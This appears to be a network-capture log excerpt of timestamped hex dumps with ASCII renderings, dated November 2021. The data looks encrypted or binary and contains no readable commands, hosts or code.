                                                                                                  2021-11-24 13:16:13 UTC51INData Raw: 97 c7 03 6e 69 a1 be da ed 3f d9 27 6b 16 89 a1 03 8e 1e 46 c7 6e ab be 95 95 9a 80 8e f5 a6 01 ae f1 a9 db 67 38 fe 78 da 44 bb ef 4a d2 72 a5 70 d6 04 42 0e 0c e5 31 74 3d 3c bb 86 03 0f 01 19 52 8e f5 8a 10 99 5c b0 a1 8f 45 68 7f 46 c7 07 24 66 31 eb 9c 4f 62 fe 07 a8 f5 5c 6a af 2f 83 50 74 4f 56 26 ba e6 f6 4b 63 f6 d4 2d 53 ac 63 3f 37 f2 46 2a 6b b4 fa 22 d2 91 a6 a5 f3 ca 5c ae f4 46 e9 11 19 fa 73 d2 ed d7 de 64 41 15 d7 7b 58 4d 8d 0f 1c 84 1f 96 ac ac 25 e3 20 cc 49 d9 d1 57 1e ba 06 b2 c4 56 a3 1f 59 57 09 34 5e 97 47 b5 13 f1 6e bd fb 25 55 80 99 6f e6 03 3f 9b 8d fb 64 58 76 24 b7 48 ad 14 e8 7f d7 b5 9c a4 8b a6 4f 37 bc 00 45 ed 6b 20 7e 87 82 62 cc 40 79 b7 81 52 cd 51 3f 25 ab 9b cc 0c 3c 92 d6 16 0e c7 64 1e 54 2d d4 d2 2f 02 68 d5 fa
                                                                                                  Data Ascii: ni?'kFng8xDJrpB1t=<R\EhF$f1Ob\j/PtOV&Kc-Sc?7F*k"\FsdA{XM% IWVYW4^Gn%Uo?dXv$HO7Ek ~b@yRQ?%<dT-/h
                                                                                                  2021-11-24 13:16:13 UTC52INData Raw: 84 48 5f 0a dc 4a f1 27 40 d8 a1 76 b9 2a c0 48 d0 a3 1b 57 59 ef c5 72 3f 66 3d de db e9 80 da 3e d8 70 7c fe 21 4e d1 10 e4 98 96 1c 59 10 6e ad 1c 0f 8f 33 99 39 2f 08 96 95 2c 8a 62 de cd 40 1b 76 ce 46 47 9f 32 23 8b 45 73 99 9f 87 64 2c 43 6a bd 52 8d 26 54 31 2e f2 46 98 b7 d6 cd 06 d1 18 ed 1d 76 29 e0 79 b7 71 b5 12 e1 80 2a 82 a7 4d c6 de d0 75 65 31 aa 0b ee f4 9b a1 4e 24 6e 92 20 f3 56 84 9c 97 73 e5 22 22 1b 49 ed 04 8d 90 96 ff bc 73 aa 65 01 1b 29 5f eb fe 61 d9 e2 92 4d c4 39 c6 eb ff 2f e6 6c ff 6b 6c 87 82 97 be 02 97 d3 66 f4 55 a9 bf 94 87 9c 7e 6c 22 09 8f 71 36 7a 4a 79 07 3f fe 15 4e 97 6c 71 47 61 5a fe 1b 44 74 2c 4d 6f 9e 24 3f 5b 32 fe f2 64 ee bf a9 a1 21 2e 3e 49 76 76 79 8b 39 46 d5 53 ef 55 ae 0c 56 33 5f b3 bb c8 be e0 80
                                                                                                  Data Ascii: H_J'@v*HWYr?f=>p|!NYn39/,b@vFG2#Esd,CjR&T1.Fv)yq*Mue1N$n Vs""Ise)_aM9/lklfU~l"q6zJy?NlqGaZDt,Mo$?[2d!.>Ivvy9FSUV3_
                                                                                                  2021-11-24 13:16:13 UTC54INData Raw: 22 fd fb 12 1a e4 c1 f5 24 e7 d7 ee 79 5d a4 5d 1d ca a1 74 32 05 8e e4 26 c9 4c c1 e6 1c 2a 60 3d 4c 7a 54 48 70 b3 dc b7 b6 b7 90 3b 0f 2d 8f 48 70 25 8c 62 74 f9 53 bd 05 d9 aa 2f 3a 90 98 47 5b bd 13 8b c1 bf 3e 2a db 14 a8 29 2d a8 a8 cc 85 c4 0b d6 08 e4 58 27 50 e9 26 00 38 6b 32 3e 24 5c 88 8b 0e 93 7d d2 29 48 62 0a 21 d3 ee 03 ad 24 70 c8 86 db 31 a7 d6 de 3c 1b 18 52 19 4c 81 6b 31 08 48 9d 05 5a 65 bc f8 14 0f 92 dd 3d f9 b8 d8 4e 1c e0 2d d7 95 8f 40 97 d2 90 52 11 66 46 06 d7 fc 1c bb fd a0 82 57 0c 2f 58 b6 7d 86 87 70 56 26 82 c6 9e 79 5b 7d 52 c3 40 3b 9f cd d6 19 dc 91 d6 87 18 90 48 3f 70 1b 7e e3 a6 7b 3a a8 32 b1 4e 69 65 02 a7 42 da bb 1a 63 a0 76 12 05 24 ff 46 7c 47 c9 38 5d 2b 02 72 fe 56 a1 b3 60 99 ce b5 ed 82 ed 53 f9 0f 76 e5
                                                                                                  Data Ascii: "$y]]t2&L*`=LzTHp;-Hp%btS/:G[>*)-X'P&8k2>$\})Hb!$p1<RLk1HZe=N-@RfFW/X}pV&y[}R@;H?p~{:2NieBcv$F|G8]+rV`Sv
                                                                                                  2021-11-24 13:16:13 UTC55INData Raw: 57 65 de 28 30 ed c0 7c 98 83 56 3f 25 3e da 07 04 ff 85 a7 ce e4 91 93 34 e2 cf 4f 8e 78 68 90 3e 87 4b 9c ce 39 5d 3f 21 05 18 c9 53 3b 27 5c 59 a2 cb 85 a9 ef 9a 09 2f 49 31 9e d4 45 ca f7 a7 26 1a b1 cf de 36 47 9b c0 12 a0 a2 4b c0 5c 2b 29 2c a7 23 19 e9 d1 44 79 f1 fe 22 ae 57 8d 06 94 76 0d cd 2e c4 20 43 e8 4b 3a b9 8d c3 68 4f 7a ef 60 52 a5 4c 11 78 b1 e8 b0 60 ba 9c 80 da 76 e1 06 ae fa f1 a8 c4 99 01 cf 95 4d 58 a0 44 c0 bf 83 ac 52 77 8b 97 2a b0 8c 11 ae 83 cd 9a bd 6a f6 ad 61 4e 6a b8 12 f6 6f 86 b0 14 81 f4 d8 44 f1 26 f5 2a a3 f8 93 2c 62 8c 08 65 d2 33 b6 ae ca 13 7d 25 3d f6 22 b6 51 28 52 23 4f 25 a2 76 88 de 17 c4 31 bc eb 52 74 e4 b6 45 7f 03 fb 5e 10 f0 67 dc cb 70 c3 b6 48 8e bb b2 b7 fa 78 2b 3f 21 ab 3f 5e b1 92 9c 5c 8f 31 a7
                                                                                                  Data Ascii: We(0|V?%>4Oxh>K9]?!S;'\Y/I1E&6GK\+),#Dy"Wv. CK:hOz`RLx`vMXDRw*jaNjoD&*,be3}%="Q(R#O%v1RtE^gpHx+?!?^\1
                                                                                                  2021-11-24 13:16:13 UTC56INData Raw: 43 80 1f 97 02 5b 61 4b 9f f7 f4 7a 9d c8 f5 c8 12 34 74 54 ac 32 4e 09 d5 e0 de 5d ce 1d a9 12 6c 27 f6 2a cf aa 45 23 8a ef c9 16 32 b0 5e 59 f2 5c 1e 49 80 a8 ee 8c 97 d2 69 38 ac c8 2e 71 d0 03 66 3f 3e e7 30 53 d7 f2 cb 74 ca 3d 94 15 b6 b3 d6 26 fd f3 14 3e ed f1 28 7b 85 a9 5a 6e 1f b9 4d 47 38 8c 48 2f 7d 11 17 f6 24 73 d2 f9 6f 74 d7 94 bd e9 18 fb 88 64 74 5b ea 49 13 e3 59 45 35 72 cf 85 2b 71 dc 9d 17 8f 12 4e a7 e3 bc 8a 15 9e 12 f6 c3 cd fb 55 14 b5 7a 3c c4 14 6c bf 12 19 20 d9 65 14 8f 40 fd 82 6a 11 65 c2 e0 d3 b9 14 c1 35 71 ef 9b 49 3c ee 15 9a 52 e7 2b c2 81 41 24 f0 81 f8 a4 a1 b6 7c 09 89 bf 29 2a 67 51 97 a6 15 73 0c 70 f8 a3 42 b9 1c d9 e8 42 fb a2 2d 68 ee 24 13 3b 31 00 3b 05 27 c3 6d 97 23 11 a9 d2 71 a0 2b ac bb b6 5f 17 47 fb
                                                                                                  Data Ascii: C[aKz4tT2N]l'*E#2^Y\Ii8.qf?>0St=&>({ZnMG8H/}$sotdt[IYE5r+qNUz<l e@je5qI<R+A$|)*gQspBB-h$;1;'m#q+_G
                                                                                                  2021-11-24 13:16:13 UTC58INData Raw: 87 fb 68 e7 03 03 6d fd 89 80 7d 0b 56 b4 29 92 da 97 ac 50 58 41 a0 f7 a8 84 47 d3 84 a2 05 44 df 73 9f 87 e2 76 ff e4 21 f3 b4 b9 4b 7c a1 24 35 49 b9 fd 2f 0d 6e 85 d3 d1 eb ed a8 88 51 fc a5 dd 33 ba c1 38 98 bb f9 6c fa 5b 1b 65 38 eb 60 31 6f 55 d9 59 7b ca 0b 15 30 08 9a 6d c0 a1 11 6f ed f0 43 bc 88 6c 43 93 dd b9 d2 69 aa 28 8b ae ac e7 81 d1 01 c3 c2 c2 4a c7 74 5d d9 8c 72 cf ab 84 f7 b5 c3 73 af 1d ce e7 5a 07 ba 0d 07 01 b4 3e ce e9 7e 15 e1 8b b8 06 f2 c4 b4 ab 00 2e fb 1e c1 de 5b e3 50 1d ca bb 4f 1a 5c 27 f2 d1 50 df 7f 60 20 87 e0 11 78 1b 36 a1 39 c4 47 f3 dd 46 75 70 14 c9 bc 7e 18 95 2d f4 a1 dc 84 5d bf 2b 64 26 b3 62 14 7a 0c d0 0b 85 45 d2 25 d4 2c 78 86 c3 b2 d3 40 9a 05 f6 2b 0a 7c 29 e8 f2 a3 98 26 6f 9e 63 45 56 e7 25 5c 01 fc
                                                                                                  Data Ascii: hm}V)PXAGDsv!K|$5I/nQ38l[e8`1oUY{0moClCi(Jt]rsZ>~.[PO\'P` x69GFup~-]+d&bzE%,x@+|)&ocEV%\
                                                                                                  2021-11-24 13:16:13 UTC59INData Raw: 0e 7b e6 7d 83 dc a0 d9 e9 9c 31 6b 06 92 ee 23 72 69 f6 a8 59 9c 8f b2 a0 6c be 75 57 6b 5d 42 41 54 49 56 6c 4b 91 ab 18 64 93 96 5f e3 04 27 43 82 c4 9d db e5 d6 59 a2 8a c7 42 dc 3a 9e a6 44 b4 66 dc f0 a9 63 e3 5a bf 4b c2 94 a7 ee ce 52 45 80 eb 9a 43 aa 2d b9 a9 10 5d fd 19 6f 8e a2 ab cb 33 33 55 14 04 c2 64 6b 90 2c 09 de dd 49 6e ef 13 5b 07 d5 46 91 76 1f 0e de 96 3b 40 83 0e 25 07 c7 8b 8e dc c9 95 65 05 52 ce 69 58 15 6f 04 8a 70 5c a7 d7 4d fc 13 c5 12 53 09 18 d5 e2 0e 94 7b a3 2a 80 b2 07 7e 56 f7 0c eb 41 50 60 f4 ca a9 fa 4d 57 96 b0 d3 36 de 27 74 d9 ca 82 59 37 19 7e 9c c3 3e 36 c8 ee 3e 9e 10 d8 a5 47 71 39 38 24 02 58 a4 b8 ca ea df e8 2c c1 92 d5 aa 22 c9 b0 20 ed 8c d7 1d 26 8a 32 87 5c 45 71 2e b6 dd 13 cb b2 30 fb 6e 83 69 8b 93
                                                                                                  Data Ascii: {}1k#riYluWk]BATIVlKd_'CYB:DfcZKREC-]o33Udk,In[Fv;@%eRiXop\MS{*~VAP`MW6'tY7~>6>Gq98$X," &2\Eq.0ni
                                                                                                  2021-11-24 13:16:13 UTC60INData Raw: 51 e7 8c 5f d8 99 6f 2e aa e5 35 d0 3d b7 78 c0 f4 c4 b5 8e b9 8f a1 1a bc 2f d1 6b 34 e5 8e 0a 05 da 57 ba af 93 ea 75 e2 ff 84 ac 07 9d 68 73 cc d5 63 bc bf 30 50 d5 6d c0 91 7f 3e cc f0 2c e6 f9 51 58 e4 12 6e 5e b7 b3 d1 ec 6a fb 66 07 36 32 4f 47 64 bc ef 82 e0 57 04 4d dd 44 c2 5f bf ef bb 1c c7 60 fb c0 e4 5f 72 38 fc de 2d 16 44 e3 fb 3c 43 c7 7b 77 1c 85 32 4e 97 06 6e 31 cf b1 18 e3 53 8f 24 89 33 17 a2 e0 74 5c b1 f0 65 40 be 71 ef a3 06 2d a3 af d7 0e 71 69 a9 e2 30 ea ff 0e 0a 17 56 d4 85 78 78 7f af ce 4b f9 92 e4 76 a2 80 92 3c 9e 50 40 da a7 bd 66 e4 dd 03 fa a1 33 80 1e 70 ec d3 4e e9 bf 66 9a 77 60 ec fe 1f 93 4e fc b3 15 87 b4 c9 fa fa 1b 98 ca 52 b0 17 56 0f 9d de 4d 42 39 8b 78 d8 cb ab f5 44 31 1e e1 ab 14 f3 dc 6e aa 41 5c 13 49 0c
                                                                                                  Data Ascii: Q_o.5=x/k4Wuhsc0Pm>,QXn^jf62OGdWMD_`_r8-D<C{w2Nn1S$3t\e@q-qi0VxxKv<P@f3pNfw`NRVMB9xD1nA\I
                                                                                                  2021-11-24 13:16:13 UTC61INData Raw: 65 fd f3 32 ce d5 45 c6 a1 53 81 3a b6 49 1e d7 51 8e 13 4e 0a 9c 27 98 7b 93 58 c1 92 be 76 74 60 f1 75 b2 8f 60 df f2 d1 b6 d6 2e eb 12 24 4f 77 ef 9d 5e 26 e6 ce f2 68 c9 ad 09 27 ac fb 93 34 55 9d 2e 71 67 e7 b9 31 84 44 55 67 73 37 10 59 88 b5 ab 53 2b 4c ca a6 d1 6e 87 3f 28 fb a9 ff 6c 4a 6c 87 35 7d 4b 24 4e a8 22 fa 7c cb f0 7c 40 4f 4b 33 4d 9f 31 a1 f2 fc a0 a7 79 26 ae d0 8c 88 c2 e9 f2 86 48 24 da 5d e6 bc b5 75 5c 9d 70 66 8d 1f bb 8d 37 9e 72 bb 0c a0 e1 53 51 26 da a8 ee bb 21 95 4c 3a 3f e2 b4 32 05 d5 89 1a 53 9f d9 f7 81 59 a9 97 07 77 3a b3 c6 b6 7b f3 c7 19 57 2b 3d 52 80 26 38 93 26 88 03 f9 95 2a 64 7a 40 d4 13 ba 54 29 d8 1c 39 80 3f fb 80 9c 76 1f c8 a1 67 ef aa 51 fb 08 50 45 23 f8 c9 26 54 c8 31 7e 62 a2 5a 7e 6d 7b 4b b7 18 73
                                                                                                  Data Ascii: e2ES:IQN'{Xvt`u`.$Ow^&h'4U.qg1DUgs7YS+Ln?(lJl5}K$N"||@OK3M1y&H$]u\pf7rSQ&!L:?2SYw:{W+=R&8&*dz@T)9?vgQPE#&T1~bZ~m{Ks
                                                                                                  2021-11-24 13:16:13 UTC63INData Raw: 76 52 1e c6 a4 be c3 5a 68 88 01 dc a4 57 f6 49 81 b0 83 75 dc 7e fe 1d cd bd cf d6 01 f2 8f 6e 60 2f 24 ba 9e ed 64 7f 7c 2d 00 ca 0f 81 c6 7d a5 c0 6d 61 d5 77 28 97 fb 46 38 07 c2 68 e8 ea 3f fe 5a 1a 24 6d f5 9d aa 89 30 3f 2c 03 0a 21 47 64 78 64 9e ae 1f de ac 34 60 a4 d6 f8 08 ec 85 f2 a2 0a 01 45 71 04 f7 c1 ff d3 f9 03 b2 8a 76 f9 34 18 ff 85 eb 6f b2 1b 48 48 23 1b 55 61 04 8b aa 48 3b 4a 27 cc 33 af 41 ad 03 a2 3f 63 2b b9 3b e2 41 c9 ec 84 c9 52 68 14 0d 58 11 b8 48 ec 7e e3 34 fb e2 4d a2 8b 52 4c 26 39 a6 11 25 1f d6 ad 67 08 5b 1b d2 4a 87 5d e1 a1 a6 70 93 ce 35 e0 4f 7f 31 49 5e bd b5 66 98 37 cd 47 54 53 fa c8 98 ee 38 4d d0 87 16 00 53 9d fb 53 14 d7 cd 82 2c ce 18 4a 57 a9 db 3b 6b 3c 26 3f cc e2 41 8e 64 9b 48 09 13 b1 c4 99 e4 76 7f
                                                                                                  Data Ascii: vRZhWIu~n`/$d|-}maw(F8h?Z$m0?,!Gdxd4`Eqv4oHH#UaH;J'3A?c+;ARhXH~4MRL&9%g[J]p5O1I^f7GTS8MSS,JW;k<&?AdHv
                                                                                                  2021-11-24 13:16:13 UTC64INData Raw: 48 0a 22 9e 4c b8 ee 97 e3 d2 97 bf 30 8b 04 12 bf 25 52 2e 33 d9 48 46 4c ae 9b af 6e be f3 a7 b0 86 58 36 85 20 54 18 25 a9 b7 21 c0 57 f1 a8 2c d8 eb 78 93 b0 69 86 70 0f 0d b1 8f d2 52 de 86 f9 e2 be 7a 8f 38 09 c0 8e e0 58 a7 c7 85 67 5f 8e 25 a7 58 33 55 ef 55 14 c8 dc 39 92 f3 02 8b 83 c4 56 e5 19 ed 41 7d 31 64 4a 7c fb 8b 14 fe 3c 40 1f 5b 4b 43 c8 96 6e c0 c2 45 24 48 80 0b 5c 9e 3a 66 e4 7a 31 bf 5e 6e dd 4d ac 98 6e e9 13 69 d3 6a 25 db 09 ca 69 87 c6 ca b1 09 48 15 42 31 8e 37 c5 01 cd 46 b1 4e eb 76 8b df 57 c1 c8 d2 ed e1 27 74 47 ea ab 08 8a e4 b6 10 bb 9b 00 ba ac 4d 59 7c 90 fb db 2a 04 14 e6 af 53 b7 82 57 bf 83 43 b6 8c 1a e3 d7 27 5a 3c a2 3e 5d 39 ff 47 4b 1f 74 87 ef 84 2e e8 f0 a2 3d f9 be b5 28 aa a8 28 5a 69 8f 2b 01 53 e1 94 07
                                                                                                  Data Ascii: H"L0%R.3HFLnX6 T%!W,xipRz8Xg_%X3UU9VA}1dJ|<@[KCnE$H\:fz1^nMnij%iHB17FNvW'tGMY|*SWC'Z<>]9GKt.=((Zi+S
                                                                                                  2021-11-24 13:16:13 UTC65INData Raw: 22 72 44 ce e9 d4 09 d5 ba f0 4d 4f f3 19 52 92 ae aa a3 45 be 56 e5 db 22 f7 45 53 59 82 16 6b 2c c3 7a 3e 84 51 8f 22 a8 76 9c db ca 35 19 02 76 52 3e 13 cc 56 60 e5 7f 02 69 37 35 63 d8 90 ca 42 e6 4b e3 a5 67 cb fb 35 01 44 76 02 bc 37 ed 68 6e ed 19 5f e8 f4 6e 56 2f fe 0f f7 c7 9e 6f 03 04 b1 4a 6c 51 71 9c c6 b0 cc 27 dd d5 b6 48 74 68 e4 37 14 03 f2 c8 40 2d 42 e6 17 da 85 de 0b 1e 75 47 22 f7 32 5f 34 2b 7f ab 5d 1f 53 7f 04 a3 ec 0d fe 09 bf 6b be 2d e2 07 1c 51 8d f3 75 93 78 b7 37 84 9b 51 23 84 df 27 37 97 88 d7 7d a2 21 8a d9 3b 6d 59 39 7d f1 38 77 af 6d fe e8 90 36 76 4d 84 64 fc 0c 50 fe 3c 85 bd d2 36 e0 d7 a6 03 72 39 3e 44 78 46 65 73 2e 6f fd 0a a4 ae 8d f1 75 cf 34 c1 9e ce 46 85 2e 85 0b 01 1a 6e 20 b1 91 66 34 51 ea 2e bc bd e6 80
                                                                                                  Data Ascii: "rDMOREV"ESYk,z>Q"v5vR>V`i75cBKg5Dv7hn_nV/oJlQq'Hth7@-BuG"2_4+]Sk-Qux7Q#'7}!;mY9}8wm6vMdP<6r9>DxFes.ou4F.n f4Q.
                                                                                                  2021-11-24 13:16:13 UTC66INData Raw: 67 83 b9 2b 54 8f bf 78 c8 d2 59 5f 7f b3 3d 13 6e 84 11 54 ba bf b1 76 30 9d 6b b9 b0 ae c2 8e 43 df 69 2c 53 12 fd 5d b8 bd 1f fa c4 c9 3e 98 8d 38 87 7b 86 4d c5 56 8a c9 53 03 12 05 ed 66 cc e2 c9 14 d5 16 44 70 40 2e 83 b5 31 eb d6 29 77 89 33 aa 0f b6 14 f0 6d a3 6a 9b aa 0a 97 8e c9 75 87 12 bc b5 28 63 c7 cf b9 6f 03 d5 6c 85 37 12 67 7c d7 dc a1 81 71 6e dd d6 0a 9f a9 6f e9 6e 34 34 f8 a1 41 78 28 16 d0 05 16 43 32 fc 00 7a f0 23 75 cf 21 f7 56 a9 4d 96 04 8e 33 89 2d 04 fd fa 48 74 a8 65 80 22 01 c9 f4 0e 4d 4f 15 dc 81 9b 0a 6b 90 30 cd 77 92 2b 1c 2c d7 27 d0 81 87 4c 7a 5e 7b 27 ff 6f 91 56 dc c3 f5 dc 13 13 7d 35 fc 70 2a 5f 55 70 6c 67 70 63 2a 09 9a 5b b2 46 fd d8 75 22 a2 e3 78 66 22 5a 63 58 e5 41 14 66 8e d2 1d cf 17 79 2a 7f b3 d0 76
                                                                                                  Data Ascii: g+TxY_=nTv0kCi,S]>8{MVSfDp@.1)w3mju(col7g|qnon44Ax(C2z#u!VM3-Hte"MOk0w+,'Lz^{'oV}5p*_Uplgpc*[Fu"xf"ZcXAfy*v
                                                                                                  2021-11-24 13:16:13 UTC67INData Raw: b7 d1 dc 0e 05 23 5b ce 1e 81 d9 f1 bd da dc b2 86 2b bc 5b ac b5 2a 68 b0 b8 3a ec 21 e7 d3 42 12 59 d5 0a 4b 27 c5 d5 f4 6b 2a 97 80 3a da a1 51 85 da fb 82 f2 b4 a0 44 3d f0 62 89 57 81 c0 73 8e 99 20 63 f5 69 e6 62 14 64 e5 86 40 53 67 36 ae eb b3 44 86 2b 11 a3 83 a6 30 15 a3 83 76 bd 2a 17 f3 f0 f3 81 80 1a 76 d1 d5 a1 f6 fa fb e2 1a c1 ae 92 1d 80 63 e7 9d 44 93 f8 f5 0d f6 53 dd c2 17 fd 0a 47 80 9e 27 e0 61 45 43 c8 61 6d 28 a8 b4 47 ec db 58 fb fb f2 b0 4b a2 2d ea 3b 5a 5d 2a 6d 3d 08 06 98 8a 8c af fd bb f3 ac a3 1d 38 b2 7a c8 17 89 70 e1 70 55 e3 36 51 e4 cb fc 0f e3 13 34 4e f1 83 bc 5c 03 ae b7 c9 c1 f2 32 eb 6b 28 4c c3 dd d3 b8 ae 43 ed ee 2e c5 d3 06 e9 c0 c7 88 2f a4 e2 e4 a6 98 cd ad ab fb 3d c3 e6 54 2e 44 32 8d af 19 2a e4 49 c7 70
                                                                                                  Data Ascii: #[+[*h:!BYK'k*:QD=bWs cibd@Sg6D+0v*vcDSG'aECam(GXK-;Z]*m=8zppU6Q4N\2k(LC./=T.D2*Ip
                                                                                                  2021-11-24 13:16:13 UTC68INData Raw: ec 9d 68 eb c2 62 96 c3 79 67 81 41 d4 55 26 5f 09 55 d4 7f f9 98 69 d6 df 44 4d 0c d2 08 3b 02 08 e3 3b 67 5c 74 1f 6d 66 bb 53 65 b7 70 61 3c 63 b9 65 4e e6 55 47 f0 95 95 a4 e5 16 49 8d 56 ab 4f ed 7a c7 91 47 f8 b4 6a 33 e4 45 60 a5 1f 8c ac fd fc 65 e2 bc 5f 9b 10 a8 32 51 55 18 b9 7c 7c 3a aa 30 4f 73 e5 0a e3 65 f2 84 6b a7 e6 a2 6b e2 a3 45 70 48 5d a9 b6 1b fd 0a 2e 30 f8 42 1d 5b c9 c6 68 6d 97 ac a0 05 00 e1 38 3a fc d1 2c 73 e5 ed 83 b1 42 db fd 78 fb 2c 3f f3 e6 06 4c b3 b6 b9 91 88 83 c7 7e 2b b4 50 e8 20 c5 0c b1 70 9d e4 36 25 f2 79 23 c3 a3 12 5b 48 5a ee a3 c2 f8 33 08 79 5c 50 79 5f b6 5e f2 20 4e a3 70 b3 dd 77 14 f0 b0 31 08 6c bf 57 26 d8 d5 5f 79 29 3b 6d 4b 42 5e f7 6d 9a c6 7a 43 1f 3c 42 b1 ab ff dd 40 ca a0 68 10 83 4a 84 28 6f
                                                                                                  Data Ascii: hbygAU&_UiDM;;g\tmfSepa<ceNUGIVOzGj3E`e_2QU||:0OsekkEpH].0B[hm8:,sBx,?L~+P p6%y#[HZ3y\Py_^ Npw1lW&_y);mKB^mzC<B@hJ(o
                                                                                                  2021-11-24 13:16:13 UTC70INData Raw: b5 26 dd 75 90 fe 0a a5 86 88 a6 4e a7 8d 7a 3c df a6 20 8e b4 08 af 95 54 f7 ff 00 c2 af 8a 12 56 3f 6d 8c db 52 e6 f6 c9 bc b5 8e 6f e2 9c 46 30 af af 8b d2 b8 20 f6 3c 62 a0 d9 91 6f 7d bd 3a 46 be 44 48 b5 03 24 09 be db 7f 97 20 2c 01 53 28 c2 da ae 79 dd 0d 8d 18 c2 69 91 3a 36 ca fb 7c 61 f1 25 50 5a 9a 88 0c 25 69 28 58 ee a4 7f 85 07 a3 54 e3 fb f2 c0 c8 1f a0 e9 04 a2 a5 ec 1f 95 d0 59 fb 85 5a e5 d9 24 35 c1 b9 7c 55 eb 8e 21 1f 52 49 bf dc ee be 93 9e df 44 d7 ee c8 27 e6 65 3c c5 ca a2 64 4a d2 53 44 c5 70 45 0b e4 32 2e 23 d6 96 4e 4d 20 0c c9 0b d0 c0 c4 26 91 8c 11 bc 28 18 6c 4c ff 5b 23 53 f8 69 9b c7 0b fb b6 89 c8 7b 7b 8c 7d 93 9a 34 9e dd 3a 70 de a7 f0 01 ed 5a df d3 ab 35 e3 41 de 60 48 9d b6 91 d9 2f 2a e8 d2 f3 fb a5 6c 48 8a b7
                                                                                                  Data Ascii: &uNz< TV?mRoF0 <bo}:FDH$ ,S(yi:6|a%PZ%i(XTYZ$5|U!RID'e<dJSDpE2.#NM &(lL[#Si{{}4:pZ5A`H/*lH
                                                                                                  2021-11-24 13:16:13 UTC71INData Raw: 98 26 43 58 2b 40 aa 62 89 55 ed a7 ff 8e f4 ab 48 e7 b6 7f d5 57 6e 98 5d a2 dd 62 a4 0b 31 4b cb 31 e2 f6 4a 60 4a d3 48 5e 2d e0 67 4a 9f c7 8f 24 b1 98 d0 be 41 d0 58 49 f1 bc f1 55 f1 85 66 3b d7 95 ec 8b 97 66 b1 33 10 45 1b 37 bf e2 93 6c 0e 99 c4 a4 da 01 8a 9c bc 0e a0 39 f0 72 3e e6 2f 1d e7 48 a4 ea f8 35 85 6a 0b 9a b3 46 5b ec d3 20 76 84 d3 e8 2c fa 96 1f 55 4b e1 74 a8 06 02 e4 67 ba 83 13 36 02 4f 57 21 0f a9 d7 c0 5e a7 02 f8 33 60 43 0a 86 0c 22 08 a7 c3 27 62 f1 ec 8f d8 78 fe 1f 95 5e de d7 76 fa cd e2 89 80 b4 06 fe 83 44 98 15 73 e0 4d 00 0e ea d9 84 c1 5e f2 08 e1 a7 cd d4 16 4b 48 b9 96 2e c3 28 35 7b a4 8c fc 03 fe 3e a2 6d 9b 55 52 bd b8 ac f3 63 5a 99 33 8e 8c fa 56 07 7e b0 65 50 85 fe 13 2d e3 e3 86 64 b6 a4 7a fd 90 36 d4 ce
                                                                                                  Data Ascii: &CX+@bUHWn]b1K1J`JH^-gJ$AXIUf;f3E7l9r>/H5jF[ v,UKtg6OW!^3`C"'bx^vDsM^KH.(5{>mURcZ3V~eP-dz6
                                                                                                  2021-11-24 13:16:13 UTC72INData Raw: 65 eb 7b 47 64 f6 31 09 fb 53 46 08 49 b4 2d fb 67 8f 30 2a cf 09 dd 7c 31 39 93 85 7d ca e8 c0 73 90 fd 3c d8 7a 05 c0 83 05 5b bb e2 56 73 3d af b7 17 07 7c 77 b3 e1 54 8c 14 97 4c f7 86 a0 02 e4 cc 23 b9 b3 58 38 2f b3 28 5a 62 d0 51 ad 1a 48 04 ff 15 f9 d4 58 2b 09 9e 34 ce a5 f7 8e ad 8b 09 36 53 6c 53 e2 e5 65 eb 14 cf ea bf 9b fb 8e e7 bc dd a4 2a 24 11 b8 43 56 97 c8 1a 3a e8 82 85 c4 a2 f5 ca f8 df 02 9a 6a b6 b4 0d be a0 20 ee 5f 2f b9 32 e5 f8 13 ff 88 d6 19 e1 7a 5e 76 5c 84 90 9a e2 13 b8 e0 6d f5 15 40 c0 d0 03 b6 40 46 56 2f f5 4c 79 f4 34 08 3c d1 a7 f1 7e 39 73 22 fc de d7 86 15 ff 41 05 ae 3a 8d 2c c0 6f 50 29 8b 7f 20 18 50 d5 f9 09 51 4a b5 a9 f5 c8 e9 9f 8a 27 4e 78 6f 1d 03 83 6a 06 82 f6 ac 8f 6b a5 67 72 4a e7 bc 6e e7 66 36 ed 7a
                                                                                                  Data Ascii: e{Gd1SFI-g0*|19}s<z[Vs=|wTL#X8/(ZbQHX+46SlSe*$CV:j _/2z^v\m@@FV/Ly4<~9s"A:,oP) PQJ'NxojkgrJnf6z
                                                                                                  2021-11-24 13:16:13 UTC74INData Raw: b0 61 b3 ba 55 4b d4 70 3e 55 46 13 c6 46 6a 20 b0 e0 00 3c 9a db c0 7f 8d 4a 74 06 a1 fe 26 ea 7f 6f 74 41 44 92 e9 54 76 03 ab 2e 8f fb 55 f0 00 c2 d5 26 f4 12 66 b8 dc 2e 96 9f ee 73 cc 2c 1a d3 c9 a5 f5 78 2a 35 5c ac 98 e4 fe 02 9d 4d fb c8 02 01 24 08 78 d0 15 8c 41 51 e5 7c ed 97 8d b3 5a f5 49 af 12 69 a8 89 f8 18 01 c1 7e f6 ce ec 9a aa 45 df 82 8d 0b a4 aa e2 4a 0c aa 78 fb 6d a5 91 78 80 e2 af fd e0 37 e3 31 20 bd e2 82 df 84 fa e7 42 c8 55 61 5f 88 ef ae f8 8c 7f 7e 17 fe 08 f7 21 c9 d6 c0 0e 2b 69 15 f5 23 c8 f7 52 b1 2d 2e 32 f4 9a bf 31 ac 5b 25 a4 e7 b2 80 df 7a f7 55 b2 22 80 e9 c8 49 8c 5b 17 5d 5d 2c 36 59 58 2e ff 97 d3 08 9c 22 97 24 3d d6 d4 73 ea 3e 9a 02 97 b3 a0 7c c0 bf 56 c6 d7 fe 4b ae 81 80 2d a1 6f 0e 81 fc d2 2e 60 a5 f7 7e
                                                                                                  Data Ascii: aUKp>UFFj <Jt&otADTv.U&f.s,x*5\M$xAQ|ZIi~EJxmx71 BUa_~!+i#R-.21[%zU"I[]],6YX."$=s>|VK-o.`~
